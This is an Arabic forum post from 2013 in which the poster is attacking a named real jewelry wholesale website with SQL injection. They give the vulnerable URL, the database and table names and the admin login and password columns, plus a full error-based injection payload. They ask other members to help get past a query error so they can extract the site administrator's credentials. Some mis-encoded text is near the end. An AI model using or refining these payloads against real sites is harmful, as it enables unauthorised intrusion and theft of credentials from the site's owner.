السلام عليكم ورحمة الله وبركاته
إخواني بحقن موقع دبل كيري وهذا رابط الثغرة
http://www.wholesale-indian-silver-j...view.php?id=74
القاعدة wisj_db_com
طيب انا استخرجت الجداول يلي بالقاعدة وبأحد الجداول يلي هو:
tbl_site_config
لقيت هذه الأعمدة:
'site_admin_login_id' 'site_admin_password'
تمام
عند الاستخراج بيظهر خطأ بيجنني !!
| | | | | | Cannot Run the Query:
select * from tbl_products where products_categories_id=74 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(tbl_site_config.site_admin_l ogin_id as char),0x27,0x7e) FROM `wisj_db_com`.tbl_site_config LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1-- - order by products_id
as following error is encountered...
| |  | |  | |
| | | | | |
Subquery returns more than 1 row
| | | | | | |
مع العلم هذا هو رابط الاستغلال يلي عم احقن فيه:
http://www.wholesale-indian-silver-jewelry.com/cat_view.php?id=74 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(tbl_site_config.site_admin_l ogin_id as char),0x27,0x7e) FROM `wisj_db_com`.tbl_site_config LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1--
أرجوكم مساعدة لو سمحتم...
ومشكورين سلفاً
Vspan style="font-weight: bold; color: #006400;"Cl[hf:VLspanC la;gm fhgprk !! g, slpjl lshu]m
03-05-2013, 08:05 AM
مجاب: مشكلة بالحقن !! لو سمحتم مساعدة 
أفضل جواب - كتبه aircrack -ng 
العرض الشجري
